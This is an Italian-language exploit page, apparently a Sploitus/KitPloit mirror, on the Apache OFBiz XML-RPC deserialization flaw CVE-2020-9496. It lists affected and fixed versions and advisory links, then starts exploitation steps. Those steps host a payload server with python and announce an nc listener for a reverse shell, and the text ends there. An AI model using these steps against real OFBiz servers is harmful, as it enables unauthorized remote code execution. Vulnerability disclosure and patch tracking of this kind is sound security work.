## https://sploitus.com/exploit?id=KITPLOIT:TOOLS-GITHUB-S4DBRD-CVE-2020-9496
# CVE-2020-9496
Poiché le 2 richieste xmlrpc correlate in webtools (xmlrpc e ping) non utilizzano l'autenticazione, sono vulnerabili a una deserializzazione non sicura.
Questo problema è stato segnalato al team di sicurezza da Alvaro Munoz some-email@example.com del GitHub Security Lab team.
# Versione interessata 17.12.01
# Versioni corrette 18.12.01, 17.12.04
Blog originale: https://securitylab.github.com/advisories/GHSL-2020-069-apache_ofbiz/
Post di Apache: https://issues.apache.org/jira/browse/OFBIZ-11716
POC di Github: https://github.com/g33xter/CVE-2020-9496
Per far funzionare questo exploit, dovrai seguire i seguenti passaggi:
### Passo 1: Ospita il servizio HTTP con python3
root@kitploit:~
> sudo python3 -m http.server 80
### Passo 2: Esegui il listener nc sulla porta desiderata (Consigliata 8001)